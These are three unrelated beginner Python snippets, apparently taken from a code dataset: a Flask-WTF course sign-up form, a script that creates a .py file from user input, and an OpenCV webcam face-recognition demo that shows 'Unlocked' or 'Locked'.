from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import Email, DataRequired
class SignUpForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
CourseName = StringField('CourseName',
validators=[DataRequired()])
CourseNumber = StringField('CourseNumber',
validators=[DataRequired()])
CourseSection = StringField('CourseSection',
validators=[DataRequired()])
submit = SubmitField('Sign Up') |
import os.path
def python():
namethefile = input("INPUT THE NAME OF THE FILE \n")
if os.path.isfile(namethefile+".py"):
files = open(namethefile+".py","r+")
else:
files = open(namethefile+".py","x")
files.close()
files = open(namethefile+".py","r+")
files.write("import random \n import time \n ")
files.close()
print("File created!")
python()
|
import cv2
import pathlib
face_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
list = []
namelist = []
currentDirectory = pathlib.Path('./TrainedFaces/')
for currentFile in currentDirectory.iterdir():
model = cv2.face.LBPHFaceRecognizer_create()
model.read(str(currentFile))
namelist.append(str(currentFile).split('\\')[1])
list.append(model)
def face_detector(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray, 1.3, 5)
if faces is ():
return img, []
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)
roi = img[y:y + h, x:x + w]
roi = cv2.resize(roi, (200, 200))
return img, roi
cap = cv2.VideoCapture(0)
image = 0
while True:
ret, frame = cap.read()
image, face = face_detector(frame)
cv2.imshow('Face Recognition', image)
if cv2.waitKey(1) == 13: # 13 is the Enter Key
try:
face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
min = 500
for i in range(0,len(list)):
results = list[i].predict(face)
print(i)
if(results[1] < min):
min = results[1]
index = i
if min < 500:
confidence = int(100 * (1 - (min) / 400))
display_string = str(confidence) + '% Confident it is ' + namelist[index].split('.')[0]
cv2.putText(image, display_string, (100, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 120, 150), 2)
if confidence > 75:
cv2.putText(image, "Unlocked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
cv2.imshow('Face Recognition', image)
else:
cv2.putText(image, "Locked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.imshow('Face Recognition', image)
except:
cv2.putText(image, "No Face Found", (220, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.putText(image, "Locked", (250, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
cv2.imshow('Face Recognition', image)
pass
break
while True:
cv2.imshow('Face Recognition', image)
if cv2.waitKey(1) == 13:
cap.release()
cv2.destroyAllWindows()
break |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.